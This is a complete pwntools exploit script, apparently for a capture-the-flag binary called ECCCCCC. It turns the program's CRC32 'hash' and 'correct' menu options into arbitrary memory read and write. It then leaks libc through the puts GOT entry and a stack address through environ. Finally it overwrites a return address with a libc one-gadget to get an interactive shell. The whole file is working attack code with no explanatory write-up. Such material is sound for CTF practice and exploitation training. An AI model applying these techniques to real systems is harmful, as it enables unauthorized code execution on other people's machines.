ECCCCCC.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os
import time
import zlib
import pwn
import subprocess
SLEEP_TIME = 0.5  # seconds to pause before each round-trip with the target

# Load the target binary (also used as pwntools' context binary) and the
# libc that accompanies it; both paths are relative to the working dir.
exe = pwn.context.binary = pwn.ELF('./ECCCCCC')
libc = pwn.ELF("./libc.so.6")

# Debug session preferences: open gdb in a tilix pane, keep core files
# under their original names.
pwn.context.terminal = ["tilix", "-t", "CTFMate", "-a", "session-add-right", "-e"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

# Remote endpoint; HOST=/PORT= on the command line override the defaults.
if pwn.args.HOST:
    host = pwn.args.HOST
else:
    host = 'ECCCCCC.pwn.so'
port = int(pwn.args.PORT or 65505)
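def local(argv=None, *a, **kw):
    '''Execute the target binary locally.

    argv: extra command-line arguments placed after the binary path.
          Defaults to none; a mutable default list is deliberately
          avoided so calls never share state.
    *a / **kw are forwarded unchanged to pwntools.
    With GDB=1 the process is launched under gdb using ``gdbscript``
    (a module-level string); otherwise a plain ``pwn.process`` is used.
    '''
    cmd = [exe.path] + (argv if argv is not None else [])
    if pwn.args.GDB:
        return pwn.gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    return pwn.process(cmd, *a, **kw)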
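def remote(argv=None, *a, **kw):
    '''Connect to the process on the remote host.

    argv, *a and **kw are accepted only to mirror ``local``'s signature;
    they are not used for a network connection. The default is ``None``
    rather than a shared mutable list.
    With GDB=1 a debugger is attached to the connection using ``gdbscript``.
    '''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io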
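def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Dispatches to ``local`` when LOCAL=1 is given, otherwise to ``remote``.
    argv defaults to ``None`` (no shared mutable default) and is passed on
    as a list so either backend can concatenate it.
    '''
    args = [] if argv is None else argv
    if pwn.args.LOCAL:
        return local(args, *a, **kw)
    return remote(args, *a, **kw)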
# Commands handed to gdb when GDB=1 is set: just resume the target.
# The .format() call has no placeholders to fill and is kept for parity.
gdbscript = "\ncontinue\n".format(**locals())

# The live tube to the target; populated once start() runs.
io = None
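def GetOffsetStdin():
    '''Return the stdin offset at which a cyclic pattern reaches the fault address.

    Runs the binary locally, feeds a 512-byte cyclic pattern on stdin, waits
    for it to terminate, then reads the faulting address from the core file
    and maps its low 32 bits back to a pattern offset.
    Logging is silenced while the crash is provoked; the previous log level
    and the child process are always restored/closed, even if reading the
    core file raises.
    '''
    saved_level = pwn.context.log_level
    pwn.context.log_level = 'critical'
    p = None
    try:
        p = pwn.process(exe.path)
        p.sendline(pwn.cyclic(512))
        p.wait()
        time.sleep(2)  # pause before reading the core file, as the original did
        fault = p.corefile.fault_addr
        # only the low 32 bits are looked up in the pattern
        ofst = pwn.cyclic_find(fault & 0xffffffff)
    finally:
        if p is not None:
            p.close()
        pwn.context.log_level = saved_level
    return ofst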
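def GetOffsetArgv():
    '''Return the argv[1] offset at which a cyclic pattern reaches the fault address.

    Same procedure as GetOffsetStdin, but the 512-byte cyclic pattern is
    passed as the first command-line argument instead of on stdin.
    Logging is silenced while the crash is provoked; the previous log level
    and the child process are always restored/closed, even if reading the
    core file raises.
    '''
    saved_level = pwn.context.log_level
    pwn.context.log_level = 'critical'
    p = None
    try:
        p = pwn.process([exe.path, pwn.cyclic(512)])
        p.wait()
        time.sleep(2)  # pause before reading the core file, as the original did
        fault = p.corefile.fault_addr
        # only the low 32 bits are looked up in the pattern
        ofst = pwn.cyclic_find(fault & 0xffffffff)
    finally:
        if p is not None:
            p.close()
        pwn.context.log_level = saved_level
    return ofst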
# Open the connection (local process or remote socket, per LOCAL=) that
# every helper below talks to through the module-level ``io``.
io = start()
def RevCRC32(hash):
    '''Return bytes whose CRC32 equals ``hash`` (an int), as a bytearray.

    Delegates to the external ``crc32.py reverse`` tool (source linked
    below) via subprocess with an argument list (no shell), and parses the
    brace-delimited, comma-separated list of hex values on the first line
    of its output. Callers (Leak, WriteSingleByte) rely on 4 bytes coming
    back. The parameter name shadows the builtin but is kept for callers.
    '''
    # source : https://github.com/theonlypwner/crc32
    out = subprocess.check_output(["python", "./crc32.py", "reverse", hex(hash)])
    first_line = out.split(b"\n")[0]
    # Slice bounds mirror the original exactly: the '{' is located in the
    # whole output, and the last character of the first line is dropped.
    inner = first_line[out.index(b"{") + 1:-1]
    return bytearray(int(tok, 16) for tok in inner.split(b","))
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
def ExOption(v):
    '''Choose menu option ``v`` (an int) after the standard SLEEP_TIME pause.'''
    time.sleep(SLEEP_TIME)
    choice = b"%d" % v
    io.sendlineafter(b"Option: ", choice)
def SetRegion(addr, len):
    '''Answer the "Begin:" / "Length:" prompts with ``addr`` (hex) and ``len`` (decimal).

    ``len`` shadows the builtin; the name is kept unchanged for callers.
    '''
    time.sleep(SLEEP_TIME)
    begin_field = b"%x" % addr
    length_field = b"%d" % len
    io.sendlineafter(b"Begin: ", begin_field)
    io.sendlineafter(b"Length: ", length_field)
def ArbRead(addr):
    '''Return the hash the target prints (parsed as hex) for the 4 bytes at ``addr``.

    Uses menu option 1 and a region of length 4.
    '''
    ExOption(1)
    SetRegion(addr, 4)
    io.recvuntil(b"hash: ")
    reported = io.recvline()
    return int(reported, 16)
def WriteSingleByte(addr, b):
    '''Set the byte at ``addr`` to ``b`` through menu option 2.

    Reverses the hash reported for the 4 bytes at ``addr`` into a preimage,
    patches its first byte, and submits the CRC32 of the patched bytes as
    the "Correct hash" answer. Calls pwn.error (which raises) if the
    target's acknowledgement line does not match.
    '''
    preimage = RevCRC32(ArbRead(addr))
    preimage[0] = b
    patched_crc = zlib.crc32(preimage)
    ExOption(2)
    SetRegion(addr, 4)
    io.sendlineafter(b"Correct hash: ", b"%d" % patched_crc)
    # Acknowledgement is the target's own output (spelling included) and
    # must be matched byte-for-byte.
    ack = io.recvline()
    if ack != b"Succesfully corrected the data!\n":
        pwn.error("Failed to write 0x%x at 0x%x" % (b, addr))
def ArbWrite(addr, data):
    '''Write ``data`` one byte at a time starting at ``addr``; always returns 0.'''
    for offset, byte in enumerate(data):
        WriteSingleByte(addr + offset, byte)
    return 0
def Leak(addr, size=8):
    '''Read ``size`` bytes at ``addr`` and return them as a little-endian int.

    size 8: two 4-byte reads (addr, addr + 4) reversed and concatenated
            into a u64; size 4: a single reversed read as a u32.
    Any other size falls through and returns None, matching the original.
    '''
    if size == 4:
        return pwn.u32(RevCRC32(ArbRead(addr)))
    if size == 8:
        low_half = RevCRC32(ArbRead(addr))
        high_half = RevCRC32(ArbRead(addr + 4))
        return pwn.u64(low_half + high_half)
    return None
# Address of the puts GOT slot in ./ECCCCCC (hard-coded; must match the binary).
PUTS_GOT_ADDR = 0x403fc0
# Resolved puts address minus its libc offset gives the libc base.
libc.address = Leak(PUTS_GOT_ADDR) - libc.symbols['puts']
# libc's environ pointer yields a stack address.
stack = Leak(libc.symbols.environ)
# Fixed distance from environ; presumably tuned for this target — verify.
retaddr = stack - 0x100
pwn.info("Libc : 0x%x" % libc.address)
pwn.info("Stack : 0x%x" % stack)
pwn.info("retaddr : 0x%x" % retaddr)
# Writes a libc address at retaddr; 0xe3b31 is an offset specific to the
# bundled libc.so.6 and is not documented here.
ArbWrite(retaddr, pwn.p64(libc.address + 0xe3b31))
# Option 0, then hand the session to the user.
ExOption(0)
io.interactive()